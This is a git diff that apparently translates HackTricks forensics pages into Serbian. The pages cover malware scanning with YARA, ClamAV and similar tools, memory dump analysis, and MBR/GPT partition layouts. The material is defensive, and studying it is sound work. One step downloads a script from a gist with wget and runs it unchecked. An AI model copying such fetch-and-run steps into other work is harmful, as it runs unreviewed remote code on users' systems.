-- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files.
-  - `A`: Added files
-  - `C`: Copied files
-  - `D`: Deleted files
-  - `M`: Modified files
-  - `R`: Renamed files
-  - `T`: Type changes (e.g., file to symlink)
-  - `U`: Unmerged files
-  - `X`: Unknown files
-  - `B`: Broken files
-
-## References
+## Reference
 
 - [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems_Ch3.pdf)
 - [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
 - [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203)
-- **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
+- **Knjiga: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
diff --git a/src/forensics/basic-forensic-methodology/malware-analysis.md b/src/forensics/basic-forensic-methodology/malware-analysis.md
index c7edd6650..29df6e28a 100644
--- a/src/forensics/basic-forensic-methodology/malware-analysis.md
+++ b/src/forensics/basic-forensic-methodology/malware-analysis.md
@@ -1,12 +1,12 @@
-# Malware Analysis
+# Analiza Malvera
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Forensics CheatSheets
+## Forenzičke CheatSheets
 
 [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/)
 
-## Online Services
+## Online Usluge
 
 - [VirusTotal](https://www.virustotal.com/gui/home/upload)
 - [HybridAnalysis](https://www.hybrid-analysis.com)
@@ -14,136 +14,119 @@
 - [Intezer](https://analyze.intezer.com)
 - [Any.Run](https://any.run/)
 
-## Offline Antivirus and Detection Tools
+## Offline Antivirus i Alati za Detekciju
 
 ### Yara
 
-#### Install
-
+#### Instaliraj
 ```bash
 sudo apt-get install -y yara
 ```
+#### Pripremite pravila
 
-#### Prepare rules
-
-Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
-Create the _**rules**_ directory and execute it. This will create a file called _**malware_rules.yar**_ which contains all the yara rules for malware.
-
+Koristite ovaj skript za preuzimanje i spajanje svih yara pravila za malware sa github-a: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\
+Kreirajte _**rules**_ direktorijum i izvršite ga. Ovo će kreirati datoteku pod nazivom _**malware_rules.yar**_ koja sadrži sva yara pravila za malware.
 ```bash
 wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py
 mkdir rules
 python malware_yara_rules.py
 ```
-
-#### Scan
-
+#### Skeniranje
 ```bash
 yara -w malware_rules.yar image  #Scan 1 file
 yara -w malware_rules.yar folder #Scan the whole folder
 ```
+#### YaraGen: Proverite malver i kreirajte pravila
 
-#### YaraGen: Check for malware and Create rules
-
-You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Part 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
-
+Možete koristiti alat [**YaraGen**](https://github.com/Neo23x0/yarGen) za generisanje yara pravila iz binarnog fajla. Pogledajte ove tutorijale: [**Deo 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Deo 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Deo 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/)
 ```bash
- python3 yarGen.py --update
- python3.exe yarGen.py --excludegood -m  ../../mals/
+python3 yarGen.py --update
+python3.exe yarGen.py --excludegood -m  ../../mals/
 ```
-
 ### ClamAV
 
-#### Install
-
+#### Instaliraj
 ```
 sudo apt-get install -y clamav
 ```
-
-#### Scan
-
+#### Skeniranje
 ```bash
 sudo freshclam      #Update rules
 clamscan filepath   #Scan 1 file
 clamscan folderpath #Scan the whole folder
 ```
-
 ### [Capa](https://github.com/mandiant/capa)
 
-**Capa** detects potentially malicious **capabilities** in executables: PE, ELF, .NET. So it will find things such as Att\&ck tactics, or suspicious capabilities such as:
+**Capa** detektuje potencijalno zlonamerne **kapacitete** u izvršnim datotekama: PE, ELF, .NET. Tako će pronaći stvari kao što su Att\&ck taktike, ili sumnjivi kapaciteti kao što su:
 
-- check for OutputDebugString error
-- run as a service
-- create process
+- provera za OutputDebugString grešku
+- pokretanje kao servis
+- kreiranje procesa
 
-Get it int he [**Github repo**](https://github.com/mandiant/capa).
+Preuzmite ga u [**Github repozitorijumu**](https://github.com/mandiant/capa).
 
 ### IOCs
 
-IOC means Indicator Of Compromise. An IOC is a set of **conditions that identify** some potentially unwanted software or confirmed **malware**. Blue Teams use this kind of definition to **search for this kind of malicious files** in their **systems** and **networks**.\
-To share these definitions is very useful as when malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
+IOC znači Indikator Kompromitacije. IOC je skup **uslova koji identifikuju** neki potencijalno neželjeni softver ili potvrđeni **malver**. Plave ekipe koriste ovu vrstu definicije da **traže ovakve zlonamerne datoteke** u svojim **sistemima** i **mrežama**.\
+Deljenje ovih definicija je veoma korisno jer kada se malver identifikuje na računaru i kreira se IOC za taj malver, druge Plave ekipe mogu to koristiti da brže identifikuju malver.
 
-A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
-You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**.
+Alat za kreiranje ili modifikovanje IOCs je [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
+Možete koristiti alate kao što su [**Redline**](https://www.fireeye.com/services/freeware/redline.html) da **tražite definisane IOCs na uređaju**.
 
 ### Loki
 
-[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
-Detection is based on four detection methods:
-
+[**Loki**](https://github.com/Neo23x0/Loki) je skener za Simple Indicators of Compromise.\
+Detekcija se zasniva na četiri metode detekcije:
 ```
 1. File Name IOC
-   Regex match on full file path/name
+Regex match on full file path/name
 
 2. Yara Rule Check
-   Yara signature matches on file data and process memory
+Yara signature matches on file data and process memory
 
 3. Hash Check
-   Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
+Compares known malicious hashes (MD5, SHA1, SHA256) with scanned files
 
 4. C2 Back Connect Check
-   Compares process connection endpoints with C2 IOCs (new since version v.10)
+Compares process connection endpoints with C2 IOCs (new since version v.10)
 ```
-
 ### Linux Malware Detect
 
-[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and malware community resources.
+[**Linux Malware Detect (LMD)**](https://www.rfxn.com/projects/linux-malware-detect/) je skener malvera za Linux koji je objavljen pod GNU GPLv2 licencom, a dizajniran je oko pretnji sa kojima se suočavaju deljeni hostovani okruženja. Koristi podatke o pretnjama iz sistema za detekciju upada na mrežnom rubu kako bi izvukao malver koji se aktivno koristi u napadima i generiše potpise za detekciju. Pored toga, podaci o pretnjama se takođe dobijaju iz korisničkih prijava putem LMD checkout funkcije i resursa zajednice malvera.
 
 ### rkhunter
 
-Tools like [**rkhunter**](http://rkhunter.sourceforge.net) can be used to check the filesystem for possible **rootkits** and malware.
-
+Alati poput [**rkhunter**](http://rkhunter.sourceforge.net) mogu se koristiti za proveru datotečnog sistema na moguće **rootkitove** i malver.
 ```bash
 sudo ./rkhunter --check -r / -l /tmp/rkhunter.log [--report-warnings-only] [--skip-keypress]
 ```
-
 ### FLOSS
 
-[**FLOSS**](https://github.com/mandiant/flare-floss) is a tool that will try to find obfuscated strings inside executables using different techniques.
+[**FLOSS**](https://github.com/mandiant/flare-floss) je alat koji pokušava da pronađe obfuskirane stringove unutar izvršnih datoteka koristeći različite tehnike.
 
 ### PEpper
 
-[PEpper ](https://github.com/Th3Hurrican3/PEpper)checks some basic stuff inside the executable (binary data, entropy, URLs and IPs, some yara rules).
+[PEpper ](https://github.com/Th3Hurrican3/PEpper)proverava neke osnovne stvari unutar izvršne datoteke (binarni podaci, entropija, URL-ovi i IP adrese, neka yara pravila).
 
 ### PEstudio
 
-[PEstudio](https://www.winitor.com/download) is a tool that allows to get information of Windows executables such as imports, exports, headers, but also will check virus total and find potential Att\&ck techniques.
+[PEstudio](https://www.winitor.com/download) je alat koji omogućava dobijanje informacija o Windows izvršnim datotekama kao što su uvozi, izvozi, zaglavlja, ali takođe proverava virus total i pronalazi potencijalne Att\&ck tehnike.
 
 ### Detect It Easy(DiE)
 
-[**DiE**](https://github.com/horsicq/Detect-It-Easy/) is a tool to detect if a file is **encrypted** and also find **packers**.
+[**DiE**](https://github.com/horsicq/Detect-It-Easy/) je alat za detekciju da li je datoteka **kriptovana** i takođe pronalazi **pakere**.
 
 ### NeoPI
 
-[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)is a Python script that uses a variety of **statistical methods** to detect **obfuscated** and **encrypted** content within text/script files. The intended purpose of NeoPI is to aid in the **detection of hidden web shell code**.
+[**NeoPI** ](https://github.com/CiscoCXSecurity/NeoPI)je Python skripta koja koristi razne **statističke metode** za detekciju **obfuskovanog** i **kriptovanog** sadržaja unutar tekstualnih/skript datoteka. Namena NeoPI-a je da pomogne u **detekciji skrivenog web shell koda**.
 
 ### **php-malware-finder**
 
-[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) does its very best to detect **obfuscated**/**dodgy code** as well as files using **PHP** functions often used in **malwares**/webshells.
+[**PHP-malware-finder**](https://github.com/nbs-system/php-malware-finder) daje sve od sebe da detektuje **obfuskovani**/**sumnjivi kod** kao i datoteke koje koriste **PHP** funkcije često korišćene u **malverima**/webshell-ima.
 
 ### Apple Binary Signatures
 
-When checking some **malware sample** you should always **check the signature** of the binary as the **developer** that signed it may be already **related** with **malware.**
-
+Kada proveravate neki **uzorak malvera**, uvek treba da **proverite potpis** binarne datoteke jer **razvijač** koji je potpisao može već biti **povezan** sa **malverom.**
 ```bash
 #Get signer
 codesign -vv -d /bin/ls 2>&1 | grep -E "Authority|TeamIdentifier"
@@ -154,19 +137,18 @@ codesign --verify --verbose /Applications/Safari.app
 #Check if the signature is valid
 spctl --assess --verbose /Applications/Safari.app
 ```
+## Tehnike Detekcije
 
-## Detection Techniques
+### Stacking Fajlova
 
-### File Stacking
+Ako znate da je neka fascikla koja sadrži **fajlove** web servera **poslednji put ažurirana na neki datum**. **Proverite** **datum** kada su svi **fajlovi** na **web serveru** kreirani i modifikovani i ako je neki datum **sumnjiv**, proverite taj fajl.
 
-If you know that some folder containing the **files** of a web server was **last updated on some date**. **Check** the **date** all the **files** in the **web server were created and modified** and if any date is **suspicious**, check that file.
+### Osnovne Linije
 
-### Baselines
+Ako **fajlovi** u fascikli **ne bi trebali biti modifikovani**, možete izračunati **hash** **originalnih fajlova** iz fascikle i **uporediti** ih sa **trenutnim**. Sve što je modifikovano će biti **sumnjivo**.
 
-If the files of a folder **shouldn't have been modified**, you can calculate the **hash** of the **original files** of the folder and **compare** them with the **current** ones. Anything modified will be **suspicious**.
+### Statistička Analiza
 
-### Statistical Analysis
-
-When the information is saved in logs you can **check statistics like how many times each file of a web server was accessed as a web shell might be one of the most**.
+Kada su informacije sačuvane u logovima, možete **proveriti statistiku kao što je koliko puta je svaki fajl web servera bio pristupljen, jer bi web shell mogao biti jedan od naj**.
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md b/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
index 0d48e3bc2..0bf2f6a4f 100644
--- a/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
+++ b/src/forensics/basic-forensic-methodology/memory-dump-analysis/README.md
@@ -1,49 +1,37 @@
-# Memory dump analysis
+# Analiza memorijskih dump-ova
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-

+## Početak
 
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
-## Start
-
-Start **searching** for **malware** inside the pcap. Use the **tools** mentioned in [**Malware Analysis**](../malware-analysis.md).
+Počnite **pretragu** za **malverom** unutar pcap-a. Koristite **alate** navedene u [**Analiza malvera**](../malware-analysis.md).
 
 ## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
 
-**Volatility is the main open-source framework for memory dump analysis**. This Python tool analyzes dumps from external sources or VMware VMs, identifying data like processes and passwords based on the dump's OS profile. It's extensible with plugins, making it highly versatile for forensic investigations.
+**Volatility je glavni open-source okvir za analizu memorijskih dump-ova**. Ovaj Python alat analizira dump-ove iz spoljašnjih izvora ili VMware VM-ova, identifikujući podatke kao što su procesi i lozinke na osnovu OS profila dump-a. Proširiv je sa plugin-ovima, što ga čini veoma svestranim za forenzičke istrage.
 
-**[Find here a cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
+**[Ovde pronađite cheatsheet](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
 
-## Mini dump crash report
+## Izveštaj o mini dump-u
 
-When the dump is small (just some KB, maybe a few MB) then it's probably a mini dump crash report and not a memory dump.
+Kada je dump mali (samo nekoliko KB, možda nekoliko MB), onda je verovatno reč o izveštaju o mini dump-u, a ne o memorijskom dump-u.
 
 ![](<../../../images/image (216).png>)
 
-If you have Visual Studio installed, you can open this file and bind some basic information like process name, architecture, exception info and modules being executed:
+Ako imate instaliran Visual Studio, možete otvoriti ovu datoteku i povezati neke osnovne informacije kao što su ime procesa, arhitektura, informacije o izuzecima i moduli koji se izvršavaju:
 
 ![](<../../../images/image (217).png>)
 
-You can also load the exception and see the decompiled instructions
+Takođe možete učitati izuzetak i videti dekompilovane instrukcije
 
 ![](<../../../images/image (219).png>)
 
 ![](<../../../images/image (218) (1).png>)
 
-Anyway, Visual Studio isn't the best tool to perform an analysis of the depth of the dump.
+U svakom slučaju, Visual Studio nije najbolji alat za izvođenje analize dubine dump-a.
 
-You should **open** it using **IDA** or **Radare** to inspection it in **depth**.
+Trebalo bi da ga **otvorite** koristeći **IDA** ili **Radare** da biste ga pregledali u **dubini**.
 
 ​
 
-

-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
index 02ab3ddf6..851285db3 100644
--- a/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
+++ b/src/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md
@@ -4,20 +4,20 @@
 
 ## Partitions
 
-A hard drive or an **SSD disk can contain different partitions** with the goal of separating data physically.\
-The **minimum** unit of a disk is the **sector** (normally composed of 512B). So, each partition size needs to be multiple of that size.
+Hard disk ili **SSD disk može sadržati različite particije** sa ciljem fizičkog razdvajanja podataka.\
+**Minimalna** jedinica diska je **sektor** (normalno sastavljen od 512B). Tako da, veličina svake particije mora biti višekratnik te veličine.
 
 ### MBR (master Boot Record)
 
-It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate to the PC what and from where a partition should be mounted.\
-It allows up to **4 partitions** (at most **just 1** can be active/**bootable**). However, if you need more partitions you can use **extended partitions**. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active.\
-MBR allows **max 2.2TB**.
+Dodeljuje se u **prvom sektoru diska nakon 446B boot koda**. Ovaj sektor je bitan da bi se PC-ju naznačilo šta i odakle treba montirati particiju.\
+Omogućava do **4 particije** (najviše **samo 1** može biti aktivna/**bootable**). Međutim, ako vam je potrebno više particija, možete koristiti **proširene particije**. **Zadnji bajt** ovog prvog sektora je potpis boot zapisa **0x55AA**. Samo jedna particija može biti označena kao aktivna.\
+MBR omogućava **maksimalno 2.2TB**.
 
 ![](<../../../images/image (489).png>)
 
 ![](<../../../images/image (490).png>)
 
-From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** (if Windows is used). The logical drive letter of the hard disk depends on the Windows Disk Signature. Changing this signature could prevent Windows from booting (tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
+Od **bajtova 440 do 443** MBR-a možete pronaći **Windows Disk Signature** (ako se koristi Windows). Logičko slovo diska hard diska zavisi od Windows Disk Signature. Promena ovog potpisa može sprečiti Windows da se pokrene (alat: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**.
 
 ![](<../../../images/image (493).png>)
 
@@ -26,122 +26,120 @@ From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Sig
 | Offset      | Length     | Item                |
 | ----------- | ---------- | ------------------- |
 | 0 (0x00)    | 446(0x1BE) | Boot code           |
-| 446 (0x1BE) | 16 (0x10)  | First Partition     |
-| 462 (0x1CE) | 16 (0x10)  | Second Partition    |
-| 478 (0x1DE) | 16 (0x10)  | Third Partition     |
-| 494 (0x1EE) | 16 (0x10)  | Fourth Partition    |
-| 510 (0x1FE) | 2 (0x2)    | Signature 0x55 0xAA |
+| 446 (0x1BE) | 16 (0x10)  | Prva particija     |
+| 462 (0x1CE) | 16 (0x10)  | Druga particija    |
+| 478 (0x1DE) | 16 (0x10)  | Treća particija     |
+| 494 (0x1EE) | 16 (0x10)  | Četvrta particija    |
+| 510 (0x1FE) | 2 (0x2)    | Potpis 0x55 0xAA |
 
-**Partition Record Format**
+**Format zapisa particije**
 
 | Offset    | Length   | Item                                                   |
 | --------- | -------- | ------------------------------------------------------ |
-| 0 (0x00)  | 1 (0x01) | Active flag (0x80 = bootable)                          |
-| 1 (0x01)  | 1 (0x01) | Start head                                             |
-| 2 (0x02)  | 1 (0x01) | Start sector (bits 0-5); upper bits of cylinder (6- 7) |
-| 3 (0x03)  | 1 (0x01) | Start cylinder lowest 8 bits                           |
-| 4 (0x04)  | 1 (0x01) | Partition type code (0x83 = Linux)                     |
-| 5 (0x05)  | 1 (0x01) | End head                                               |
-| 6 (0x06)  | 1 (0x01) | End sector (bits 0-5); upper bits of cylinder (6- 7)   |
-| 7 (0x07)  | 1 (0x01) | End cylinder lowest 8 bits                             |
-| 8 (0x08)  | 4 (0x04) | Sectors preceding partition (little endian)            |
-| 12 (0x0C) | 4 (0x04) | Sectors in partition                                   |
+| 0 (0x00)  | 1 (0x01) | Aktivna zastavica (0x80 = bootable)                   |
+| 1 (0x01)  | 1 (0x01) | Početna glava                                         |
+| 2 (0x02)  | 1 (0x01) | Početni sektor (bitovi 0-5); gornji bitovi cilindra (6- 7) |
+| 3 (0x03)  | 1 (0x01) | Početni cilindar najniži 8 bitova                     |
+| 4 (0x04)  | 1 (0x01) | Kod tipa particije (0x83 = Linux)                     |
+| 5 (0x05)  | 1 (0x01) | Krajnja glava                                         |
+| 6 (0x06)  | 1 (0x01) | Krajnji sektor (bitovi 0-5); gornji bitovi cilindra (6- 7)   |
+| 7 (0x07)  | 1 (0x01) | Krajnji cilindar najniži 8 bitova                     |
+| 8 (0x08)  | 4 (0x04) | Sektori koji prethode particiji (little endian)       |
+| 12 (0x0C) | 4 (0x04) | Sektori u particiji                                   |
 
-In order to mount an MBR in Linux you first need to get the start offset (you can use `fdisk` and the `p` command)
+Da biste montirali MBR u Linuxu, prvo morate dobiti početni offset (možete koristiti `fdisk` i komandu `p`)
 
-![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
-
-And then use the following code
+![](<../../../images/image (413) (3) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (12).png>)
 
+I zatim koristite sledeći kod
 ```bash
 #Mount MBR in Linux
 mount -o ro,loop,offset=
 #63x512 = 32256Bytes
 mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
 ```
+**LBA (Logičko adresiranje blokova)**
 
-**LBA (Logical block addressing)**
+**Logičko adresiranje blokova** (**LBA**) je uobičajen sistem koji se koristi za **određivanje lokacije blokova** podataka koji se čuvaju na uređajima za skladištenje računara, obično na sekundarnim sistemima skladištenja kao što su hard diskovi. LBA je posebno jednostavan linearni sistem adresiranja; **blokovi se lociraju pomoću celobrojnog indeksa**, pri čemu je prvi blok LBA 0, drugi LBA 1, i tako dalje.
 
-**Logical block addressing** (**LBA**) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on.
+### GPT (GUID tabela particija)
 
-### GPT (GUID Partition Table)
+GUID tabela particija, poznata kao GPT, favorizovana je zbog svojih poboljšanih mogućnosti u poređenju sa MBR (Master Boot Record). Karakteristična po svom **globalno jedinstvenom identifikatoru** za particije, GPT se izdvaja na nekoliko načina:
 
-The GUID Partition Table, known as GPT, is favored for its enhanced capabilities compared to MBR (Master Boot Record). Distinctive for its **globally unique identifier** for partitions, GPT stands out in several ways:
+- **Lokacija i veličina**: I GPT i MBR počinju na **sektoru 0**. Međutim, GPT radi na **64bita**, u kontrastu sa MBR-ovih 32bita.
+- **Ograničenja particija**: GPT podržava do **128 particija** na Windows sistemima i može da primi do **9.4ZB** podataka.
+- **Imena particija**: Omogućava imenovanje particija sa do 36 Unicode karaktera.
 
-- **Location and Size**: Both GPT and MBR start at **sector 0**. However, GPT operates on **64bits**, contrasting with MBR's 32bits.
-- **Partition Limits**: GPT supports up to **128 partitions** on Windows systems and accommodates up to **9.4ZB** of data.
-- **Partition Names**: Offers the ability to name partitions with up to 36 Unicode characters.
+**Otpornost podataka i oporavak**:
 
-**Data Resilience and Recovery**:
+- **Redundancija**: Za razliku od MBR-a, GPT ne ograničava particionisanje i podatke o pokretanju na jedno mesto. Replikuje ove podatke širom diska, poboljšavajući integritet i otpornost podataka.
+- **Ciklična kontrola redundancije (CRC)**: GPT koristi CRC za osiguranje integriteta podataka. Aktivno prati oštećenje podataka, a kada se otkrije, GPT pokušava da povrati oštećene podatke iz druge lokacije na disku.
 
-- **Redundancy**: Unlike MBR, GPT doesn't confine partitioning and boot data to a single place. It replicates this data across the disk, enhancing data integrity and resilience.
-- **Cyclic Redundancy Check (CRC)**: GPT employs CRC to ensure data integrity. It actively monitors for data corruption, and when detected, GPT attempts to recover the corrupted data from another disk location.
+**Zaštitni MBR (LBA0)**:
 
-**Protective MBR (LBA0)**:
-
-- GPT maintains backward compatibility through a protective MBR. This feature resides in the legacy MBR space but is designed to prevent older MBR-based utilities from mistakenly overwriting GPT disks, hence safeguarding the data integrity on GPT-formatted disks.
+- GPT održava unazad kompatibilnost kroz zaštitni MBR. Ova funkcija se nalazi u prostoru nasleđenog MBR-a, ali je dizajnirana da spreči starije MBR-bazirane alate da greškom prepisuju GPT diskove, čime se štiti integritet podataka na GPT-formatiranim diskovima.
 
 ![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../images/image (491).png>)
 
-**Hybrid MBR (LBA 0 + GPT)**
+**Hibridni MBR (LBA 0 + GPT)**
 
-[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
+[Sa Wikipedije](https://en.wikipedia.org/wiki/GUID_Partition_Table)
 
-In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes.
+U operativnim sistemima koji podržavaju **GPT-bazirano pokretanje putem BIOS** usluga umesto EFI, prvi sektor se takođe može koristiti za skladištenje prve faze **bootloader** koda, ali **modifikovan** da prepozna **GPT** **particije**. Bootloader u MBR-u ne sme da pretpostavlja veličinu sektora od 512 bajta.
 
-**Partition table header (LBA 1)**
+**Zaglavlje tabele particija (LBA 1)**
 
-[From Wikipedia](https://en.wikipedia.org/wiki/GUID_Partition_Table)
+[Sa Wikipedije](https://en.wikipedia.org/wiki/GUID_Partition_Table)
 
-The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table (offsets 80 and 84 in the table).
+Zaglavlje tabele particija definiše upotrebljive blokove na disku. Takođe definiše broj i veličinu unosa particija koji čine tabelu particija (offseti 80 i 84 u tabeli).
 
-| Offset    | Length   | Contents                                                                                                                                                                     |
+| Offset    | Length   | Sadržaj                                                                                                                                                                     |
 | --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
-| 0 (0x00)  | 8 bytes  | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines) |
-| 8 (0x08)  | 4 bytes  | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8                                                                                                                                  |
-| 12 (0x0C) | 4 bytes  | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes)                                                                                                 |
-| 16 (0x10) | 4 bytes  | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation                             |
-| 20 (0x14) | 4 bytes  | Reserved; must be zero                                                                                                                                                       |
-| 24 (0x18) | 8 bytes  | Current LBA (location of this header copy)                                                                                                                                   |
-| 32 (0x20) | 8 bytes  | Backup LBA (location of the other header copy)                                                                                                                               |
-| 40 (0x28) | 8 bytes  | First usable LBA for partitions (primary partition table last LBA + 1)                                                                                                       |
-| 48 (0x30) | 8 bytes  | Last usable LBA (secondary partition table first LBA − 1)                                                                                                                    |
-| 56 (0x38) | 16 bytes | Disk GUID in mixed endian                                                                                                                                                    |
-| 72 (0x48) | 8 bytes  | Starting LBA of an array of partition entries (always 2 in primary copy)                                                                                                     |
-| 80 (0x50) | 4 bytes  | Number of partition entries in array                                                                                                                                         |
-| 84 (0x54) | 4 bytes  | Size of a single partition entry (usually 80h or 128)                                                                                                                        |
-| 88 (0x58) | 4 bytes  | CRC32 of partition entries array in little endian                                                                                                                            |
-| 92 (0x5C) | \*       | Reserved; must be zeroes for the rest of the block (420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes)                                      |
+| 0 (0x00)  | 8 bajta  | Potpis ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h ili 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)na little-endian mašinama) |
+| 8 (0x08)  | 4 bajta  | Revizija 1.0 (00h 00h 01h 00h) za UEFI 2.8                                                                                                                                  |
+| 12 (0x0C) | 4 bajta  | Veličina zaglavlja u little endian (u bajtovima, obično 5Ch 00h 00h 00h ili 92 bajta)                                                                                                 |
+| 16 (0x10) | 4 bajta  | [CRC32](https://en.wikipedia.org/wiki/CRC32) zaglavlja (offset +0 do veličine zaglavlja) u little endian, sa ovim poljem nula tokom izračunavanja                             |
+| 20 (0x14) | 4 bajta  | Rezervisano; mora biti nula                                                                                                                                                       |
+| 24 (0x18) | 8 bajta  | Trenutni LBA (lokacija ove kopije zaglavlja)                                                                                                                                   |
+| 32 (0x20) | 8 bajta  | Backup LBA (lokacija druge kopije zaglavlja)                                                                                                                               |
+| 40 (0x28) | 8 bajta  | Prvi upotrebljivi LBA za particije (poslednji LBA primarne tabele particija + 1)                                                                                                       |
+| 48 (0x30) | 8 bajta  | Poslednji upotrebljivi LBA (prvi LBA sekundarne tabele particija − 1)                                                                                                                    |
+| 56 (0x38) | 16 bajta | Disk GUID u mešovitom endian                                                                                                                                                    |
+| 72 (0x48) | 8 bajta  | Početni LBA niza unosa particija (uvek 2 u primarnoj kopiji)                                                                                                     |
